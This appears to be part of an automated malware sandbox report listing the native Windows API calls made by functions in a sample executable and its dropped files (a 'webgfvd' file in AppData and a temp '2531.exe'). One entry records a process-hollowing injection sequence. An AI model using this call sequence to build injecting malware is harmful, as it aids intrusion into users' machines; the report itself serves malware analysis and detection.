Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D60E9 ZwOpenKey,ZwClose,ZwClose, 1_2_6E1D60E9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 1_2_6E129100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E130100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 1_2_6E130100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169900 ZwOpenEvent, 1_2_6E169900
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1C5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 1_2_6E1C5100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B193B ZwRaiseException,ZwTerminateProcess, 1_2_6E1B193B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1FF13B ZwOpenKey,ZwCreateKey, 1_2_6E1FF13B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A130 ZwCreateWaitCompletionPacket, 1_2_6E16A130
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169920 ZwDuplicateToken, 1_2_6E169920
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 1_2_6E12F150
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B150 ZwUnsubscribeWnfStateChange, 1_2_6E16B150
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 1_2_6E12395E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 1_2_6E14B944
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 1_2_6E12B171
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B1976 ZwCreateEvent, 1_2_6E1B1976
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B160 ZwUpdateWnfStateData, 1_2_6E16B160
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A160 ZwCreateWorkerFactory, 1_2_6E16A160
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8966
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169990 ZwQueryVolumeInformationFile, 1_2_6E169990
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 1_2_6E12519E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 1_2_6E14C182
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169980 ZwCreateEvent, 1_2_6E169980
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B180 ZwWaitForAlertByThreadId, 1_2_6E16B180
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 1_2_6E1EA189
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 1_2_6E1D6186
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 1_2_6E1A51BE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16A9B0 ZwQueryLicenseValue, 1_2_6E16A9B0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B1A0 ZwWaitForKeyedEvent, 1_2_6E16B1A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 1_2_6E1E49A4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 1_2_6E1B19C8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F89E7
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_1_0040245F NtOpenKey,NtEnumerateKey,NtEnumerateKey,NtClose, 1_1_0040245F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_1_004025EA NtEnumerateKey,NtEnumerateKey,NtClose, 1_1_004025EA
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 16_2_03320110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 16_2_03320110
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 18_2_00E63CB8 NtAllocateVirtualMemory, 18_2_00E63CB8
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 18_2_00E63BB8 NtUnmapViewOfSection, 18_2_00E63BB8
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 18_2_00E63BB0 NtUnmapViewOfSection, 18_2_00E63BB0
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 18_2_00E63CB0 NtAllocateVirtualMemory, 18_2_00E63CB0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_0040194C Sleep,NtTerminateProcess, 24_2_0040194C
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_00401957 Sleep,NtTerminateProcess, 24_2_00401957
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_0040245F NtOpenKey,NtEnumerateKey,NtEnumerateKey,NtClose, 24_2_0040245F
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_00401968 Sleep,NtTerminateProcess, 24_2_00401968
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_00401972 Sleep,NtTerminateProcess, 24_2_00401972
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_00401976 Sleep,NtTerminateProcess, 24_2_00401976
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_004025EA NtEnumerateKey,NtEnumerateKey,NtClose, 24_2_004025EA
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_004019F2 NtTerminateProcess, 24_2_004019F2
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB98C0 ZwDuplicateObject,LdrInitializeThunk, 24_2_6ACB98C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9860 ZwQuerySystemInformation,LdrInitializeThunk, 24_2_6ACB9860
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9820 ZwEnumerateKey,LdrInitializeThunk, 24_2_6ACB9820
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB99A0 ZwCreateSection,LdrInitializeThunk, 24_2_6ACB99A0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9660 ZwAllocateVirtualMemory,LdrInitializeThunk, 24_2_6ACB9660
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB967A NtQueryInformationProcess,LdrInitializeThunk, 24_2_6ACB967A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9600 ZwOpenKey,LdrInitializeThunk, 24_2_6ACB9600
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9780 ZwMapViewOfSection,LdrInitializeThunk, 24_2_6ACB9780
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01AD6 ZwFreeVirtualMemory, 24_2_6AD01AD6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48ADD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAAC0 ZwQueryWnfStateNameInformation, 24_2_6ACBAAC0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 24_2_6AC9FAD0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9AE0 ZwTraceEvent, 24_2_6ACB9AE0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAAE0 ZwRaiseException, 24_2_6ACBAAE0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAAF0 ZwRaiseHardError, 24_2_6ACBAAF0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC92280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 24_2_6AC92280
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB280 ZwWow64DebuggerCall, 24_2_6ACBB280
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 24_2_6AC7429E
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAA90 ZwQuerySystemInformationEx, 24_2_6ACBAA90
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAD294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 24_2_6ACAD294
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC752A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 24_2_6AC752A5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC71AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 24_2_6AC71AA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA5AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 24_2_6ACA5AA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAE2BB ZwWaitForAlertByThreadId, 24_2_6ACAE2BB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9AB0 ZwWaitForMultipleObjects, 24_2_6ACB9AB0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 24_2_6AC79240
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 24_2_6AD01242
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48A62
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 24_2_6AD48214
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9A00 ZwProtectVirtualMemory, 24_2_6ACB9A00
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6AC75210
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 24_2_6AC9A229
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 24_2_6AC74A20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAA20 ZwQuerySecurityAttributesToken, 24_2_6ACBAA20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAB230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 24_2_6ACAB230
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC78239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 24_2_6AC78239
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 24_2_6AC72BC2
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC723F6 ZwClose,RtlFreeHeap, 24_2_6AC723F6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9BF0 ZwAlertThreadByThreadId, 24_2_6ACB9BF0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 24_2_6AC72B93
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6ACA939F
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD3138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD3138A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA390 ZwGetCachedSigningLevel, 24_2_6ACBA390
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48BB6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA4BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 24_2_6ACA4BAD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD49BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD49BBE
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA3A0 ZwGetCompleteWnfStateSubscription, 24_2_6ACBA3A0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD31BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD31BA8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA3B48 ZwClose,ZwClose, 24_2_6ACA3B48
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48B58
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD08372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 24_2_6AD08372
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC86B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 24_2_6AC86B6B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACF7365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 24_2_6ACF7365
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAB60 ZwReleaseKeyedEvent, 24_2_6ACBAB60
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA3B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 24_2_6ACA3B7A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72B7E ZwSetInformationThread,ZwClose, 24_2_6AC72B7E
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD26369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 24_2_6AD26369
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAB70 ZwReleaseWorkerFactoryWorker, 24_2_6ACBAB70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 24_2_6AC74B00
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD3131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD3131B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9B00 ZwSetValueKey, 24_2_6ACB9B00
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA5306 ZwReleaseKeyedEvent, 24_2_6ACA5306
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79335 ZwClose,ZwClose, 24_2_6AC79335
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD0B8D0 RtlAcquirePrivilege,RtlAllocateHeap,ZwSetInformationThread,RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwAdjustPrivilegesToken,RtlAllocateHeap,ZwAdjustPrivilegesToken,RtlFreeHeap,RtlFreeHeap,ZwClose,ZwSetInformationThread,ZwClose,RtlFreeHeap, 24_2_6AD0B8D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC770C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6AC770C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB00C2 ZwAlertThreadByThreadId, 24_2_6ACB00C2
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA0D0 ZwCreateTimer2, 24_2_6ACBA0D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB98D0 ZwQueryAttributesFile, 24_2_6ACB98D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB10D7 ZwOpenKey,ZwCreateKey, 24_2_6ACB10D7
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC880FC RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege, 24_2_6AC880FC
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 24_2_6AC7B8F0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC740FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 24_2_6AC740FD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB108B ZwClose, 24_2_6ACB108B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC73880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 24_2_6AC73880
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACF3884 ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap, 24_2_6ACF3884
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6AC9E090
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA890 ZwQueryDebugFilterState, 24_2_6ACBA890
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9890 ZwFsControlFile, 24_2_6ACB9890
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9F0AE ZwSetInformationWorkerFactory, 24_2_6AC9F0AE
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD260A2 ZwQueryInformationFile, 24_2_6AD260A2
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA18B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 24_2_6ACA18B9
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAF0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 24_2_6ACAF0BF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB0B0 ZwTraceControl, 24_2_6ACBB0B0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9840 ZwDelayExecution, 24_2_6ACB9840
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48858 ZwAlertThreadByThreadId, 24_2_6AD48858
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 24_2_6AC75050
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC8106F ZwOpenKey,ZwClose, 24_2_6AC8106F
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 24_2_6AD01879
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9800 ZwOpenProcessTokenEx, 24_2_6ACB9800
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD4F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 24_2_6AD4F019
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 24_2_6AC7F018
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 24_2_6ACA4020
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9830 ZwOpenFile, 24_2_6ACB9830
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD019C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 24_2_6AD019C8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD489E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD489E7
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB180 ZwWaitForAlertByThreadId, 24_2_6ACBB180
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9980 ZwCreateEvent, 24_2_6ACB9980
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 24_2_6AC9C182
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6AC7519E
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD3A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 24_2_6AD3A189
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9990 ZwQueryVolumeInformationFile, 24_2_6ACB9990
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB1A0 ZwWaitForKeyedEvent, 24_2_6ACBB1A0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA19B8 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwWaitForSingleObject,RtlQueryInformationActiveActivationContext,RtlQueryInformationActivationContext, 24_2_6ACA19B8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD349A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6AD349A4
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA9B0 ZwQueryLicenseValue, 24_2_6ACBA9B0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 24_2_6AC9B944
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 24_2_6AC7395E
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB150 ZwUnsubscribeWnfStateChange, 24_2_6ACBB150
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01976 ZwCreateEvent, 24_2_6AD01976
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB160 ZwUpdateWnfStateData, 24_2_6ACBB160
